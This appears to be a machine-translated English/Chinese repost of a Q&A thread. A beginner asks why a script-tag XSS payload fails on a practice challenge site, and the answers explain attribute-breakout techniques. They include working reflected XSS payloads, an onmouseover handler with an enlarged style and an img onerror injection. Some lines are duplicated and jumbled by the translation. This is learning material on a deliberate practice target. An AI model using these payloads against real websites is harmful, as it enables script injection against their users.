[英]Bug bounty XSS vulnerability website payload
I recently started to teach myself XSS vulnerability and stumbled this website for practice.我最近开始自学 XSS 漏洞并偶然发现了这个网站进行练习。
https://sudo.co.il/xss/level2.php
But after several attempts to enter several payloads但经过多次尝试输入多个有效载荷
Example: <script>alert('XSS')</script>
I can't get XSS to work.我无法让 XSS 工作。
The value is reflected in the input value attribute.该值反映在输入值属性中。 You can escape this by starting with a
"
and then add other attributes. For example: " onmouseover="alert('XSS')"
.您可以通过以
"
开头然后添加其他属性来转义它。例如: " onmouseover="alert('XSS')"
。
To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
要减少用户交互,您可以更改样式:
" onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
" onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
or there may be better attributes to use instead. " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px"
或者可能有更好的属性可以代替。
You can escape this by starting with a "
您可以通过以
"
For example: "><img/src=x onerror=alert(origin)>
例如:
"><img/src=x onerror=alert(origin)>
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.